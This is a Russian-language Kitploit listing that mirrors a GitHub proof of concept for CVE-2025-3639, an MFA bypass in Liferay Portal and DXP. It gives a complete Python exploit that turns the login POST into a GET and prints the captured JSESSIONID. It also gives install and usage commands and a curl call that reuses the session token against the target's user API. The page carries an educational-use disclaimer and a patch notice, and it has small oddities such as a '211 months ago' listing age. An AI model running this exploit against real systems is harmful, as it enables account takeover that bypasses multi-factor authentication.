Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3639 — уязвимость обхода аутентификации в Liferay Portal (версии 7.3.0–7.4.3.132) и Liferay DXP (различные версии от 2024.Q1 до 2025.Q1.6) | Kitploit
Инструменты/GitHubGitHub/6lj/cve-2025-3639
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub6lj/cve-2025-3639

CVE-2025-3639

уязвимость обхода аутентификации в Liferay Portal (версии 7.3.0–7.4.3.132) и Liferay DXP (различные версии от 2024.Q1 до 2025.Q1.6)

Репозиторий
211 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-3639 PoC - Обход аутентификации Liferay Portal/DXP

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-3639 — уязвимости обхода аутентификации в Liferay Portal (версии 7.3.0–7.4.3.132) и Liferay DXP (различные версии от 2024.Q1 до 2025.Q1.6). PoC демонстрирует, как неаутентифицированный пользователь с действительными учетными данными может обойти многофакторную аутентификацию (MFA), изменив POST-запрос на GET-запрос, потенциально получая несанкционированный доступ к учетным записям пользователей.

Предупреждение: Этот PoC предназначен только для образовательных целей. Несанкционированное тестирование или эксплуатация этой уязвимости незаконны и неэтичны. Используйте только с явного письменного разрешения владельца системы.

Требования

  • Окружение: Linux (например, Kali Linux, Ubuntu или виртуализированная среда).
  • Зависимости:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • Сеть: Доступ к целевому экземпляру Liferay Portal/DXP (должен находиться в тестовой среде с явного разрешения).
  • Учетные данные: Действительные учетные данные пользователя для целевого экземпляра Liferay.

Установка

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Убедитесь, что установлены Python 3 и библиотека requests:

    root@kitploit:~
    pip3 install requests
    

Что это делает

  • PoC эксплуатирует CVE-2025-3639, изменяя POST-запрос входа на GET-запрос, обходя проверки MFA.
  • Он отправляет сконструированный HTTP GET-запрос с действительными учетными данными для аутентификации без завершения процесса MFA.
  • Скрипт предназначен для демонстрации уязвимости в контролируемой авторизованной среде.

Использование

Запустите скрипт PoC с соответствующими аргументами (замените <target_url>, <username> и <password> на URL целевого экземпляра Liferay и действительные учетные данные).

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • Параметры:
    • --target: URL экземпляра Liferay Portal/DXP (например, http://example.com).
    • --username: Действительное имя пользователя для целевого экземпляра.
    • --password: Действительный пароль для имени пользователя.

Пример

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

Проверка результатов

  • Успех: Если эксплойт сработает, скрипт вернет действительный токен сессии или сообщение об успехе, указывающее на доступ к учетной записи пользователя без MFA.

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • Ожидаемый вывод: данные пользователя, подтверждающие успешную аутентификацию.
  • Неудача: Если сервер возвращает ошибку (например, 401 Unauthorized или 403 Forbidden), экземпляр может быть не уязвим, или MFA не включена.

  • Мониторинг трафика: Используйте такой инструмент, как Wireshark, для проверки HTTP-трафика:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

Скрипт PoC

Ниже приведен пример кода для poc.py:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

Важные заметки

  • Этот PoC требует действительных учетных данных, так как уязвимость позволяет обойти MFA, но не подбирать учетные данные.
  • Тестируйте только в контролируемой среде с явного разрешения владельца системы.
  • Уязвимость исправлена в более новых версиях Liferay Portal/DXP. Обновитесь до последней версии для устранения этой проблемы.
  • Консультация по безопасности Liferay
  • NVD CVE-2025-3639
  • Репозиторий GitHub

Отказ от ответственности

Этот проект предназначен только для образовательных целей. Автор не несет ответственности за любое несанкционированное или незаконное использование этого PoC. Всегда получайте явное разрешение от владельца системы перед тестированием.

Скачать инструмент